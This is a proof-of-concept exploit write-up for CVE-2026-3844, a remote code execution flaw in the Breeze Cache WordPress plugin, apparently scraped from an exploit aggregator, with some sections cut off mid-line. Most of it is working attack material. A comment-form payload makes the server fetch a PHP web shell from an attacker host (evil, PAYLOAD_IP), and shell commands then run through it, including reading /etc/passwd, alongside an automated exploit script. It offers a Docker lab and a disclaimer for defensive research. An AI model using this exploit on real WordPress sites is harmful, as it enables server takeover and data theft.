Exploit for CVE-2026-3844

## https://sploitus.com/exploit?id=6CE770C7-6A87-5F3E-8503-233B6FB19113
# CVE-2026-3844 — Breeze Cache move(
                $temp_gravatar,
                $gravatar_local_path . $gravatar_name,  //  |
   |                                        |  Comment saved
   |                                        |
   |  2. GET /?p=1                          |
   |  ------------------------------------> |
   |                                        |  get_avatar filter fires
   |                                        |  breeze_replace_gravatar_image()
   |                                        |    extracts srcset URL via regex
   |                                        |    calls fetch_gravatar_from_remote()
   |                                        |
   |            3. download_url()           |
   |            http://evil/s.php           |
   |          |
   |                                        |  Saved to:
   |                                        |  wp-content/cache/breeze-extra/
   |                                        |    gravatars/s.php
   |                                        |
   |  4. GET /wp-content/cache/breeze-extra |
   |         /gravatars/s.php?cmd=id        |
   |  ------------------------------------> |
   |                                        |  PHP executes as www-data
   |         uid=33(www-data)               |
   |   Breeze > Advanced)
3. WordPress comments must be open on at least one post
4. The attacker's payload server must be reachable from the WordPress server

---

## Docker Lab Setup

This PoC includes a self-contained Docker environment with:
- WordPress 6.5 + Breeze 2.4.4 (vulnerable, with gravatar hosting enabled)
- MariaDB 10.11
- A Python HTTP server hosting the PoC payload

### Prerequisites

- Docker and Docker Compose
- Python 3.8+ with `requests` (`pip install requests`)

### 1. Start the Lab

```bash
cd docker/
docker compose up -d --build
```

Wait ~30 seconds for WordPress to initialize. Verify:

```bash
curl -s http://localhost:8088/wp-content/plugins/breeze/readme.txt | grep "Stable tag"
# Expected: Stable tag: 2.4.4
```

### 2. Verify Preconditions

```
$ curl -s http://localhost:8088/wp-content/plugins/breeze/readme.txt | head -8

=== Breeze Cache ===
Contributors: Cloudways
Tags: cache,caching, performance, wp-cache, cdn
Requires at least: 6.0
Tested up to: 6.9
Requires PHP: 7.4
Stable tag: 2.4.4
```

The Docker setup automatically:
- Enables "Host Files Locally - Gravatars" (`breeze-store-gravatars-locally: 1`)
- Opens comments on posts
- Disables comment moderation (for immediate exploitation)

---

## Exploitation

### Manual Steps

#### Step 1 — Post the Malicious Comment

```bash
curl -X POST "http://localhost:8088/wp-comments-post.php" \
    -d "comment_post_ID=1&author=x+srcset=http://PAYLOAD_IP:9999/shell.php&email=test@test.com&comment=test&submit=Post+Comment"
```

Replace `PAYLOAD_IP` with the payload container's IP:
```bash
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' \
    $(docker compose -f docker/docker-compose.yml ps -q payload)
```

Expected response: `HTTP 302` redirect to the post page.

```
> POST /wp-comments-post.php HTTP/1.1
> Host: localhost:8088
> Content-Type: application/x-www-form-urlencoded
 /dev/null
```

The rendered HTML shows Breeze replaced the URL with a local cache path:
```html

```

#### Step 3 — Verify File on Disk

```
$ docker exec CONTAINER ls -la /var/www/html/wp-content/cache/breeze-extra/gravatars/shell.php

-rw-r--r-- 1 www-data www-data 303 Apr 25 17:31 shell.php
```

The PHP payload is written verbatim, owned by `www-data`.

#### Step 4 — Confirm RCE

```
$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php"
CVE-2026-3844-VERIFIED

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=id"
CVE-2026-3844-VERIFIED
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=whoami"
CVE-2026-3844-VERIFIED
www-data

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=uname+-a"
CVE-2026-3844-VERIFIED
Linux cac7bf7f523f 6.12.76-linuxkit #1 SMP Sun Mar  8 14:41:59 UTC 2026 aarch64 GNU/Linux

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=cat+/etc/passwd+|+head+-3"
CVE-2026-3844-VERIFIED
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```

### Automated Exploit Script

```bash
cd poc/
pip install requests
python3 exploit.py --target http://localhost:8088 --payload http://PAYLOAD_IP:9999/shell.php
```

```
======================================================================
CVE-2026-3844 — Breeze Cache 
       Require all denied
   
   ```

## File Structure

```
cve-2026-3844/
  README.md              # This file
  docker/
    Dockerfile           # WordPress + Breeze 2.4.4 image
    docker-compose.yml   # Full lab (WP + MariaDB + payload server)
    entrypoint-custom.sh # Auto-configures WP with vulnerable settings
  poc/
    exploit.py           # Automated PoC exploit script
    validate.sh          # End-to-end Docker validation harness
  payloads/
    shell.php            # Harmless PoC payload (echo + id)
  screenshots/           # Step-by-step evidence captures
  validation/            # RAPTOR exploitability validation output
```

## References

- [NVD — CVE-2026-3844](https://nvd.nist.gov/vuln/detail/CVE-2026-3844)
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/id/e342b1c0-6e7f-4e2c-8a52-018df12c12a0)
- [WordPress Patch Changeset 3511463](https://plugins.trac.wordpress.org/changeset/3511463/breeze)
- [Vulnerable Source (2.4.1 tag)](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L119)

## Disclaimer

This proof-of-concept is provided for **authorized security testing, education, and defensive
research only**. Unauthorized use against systems you do not own or have explicit permission
to test is illegal.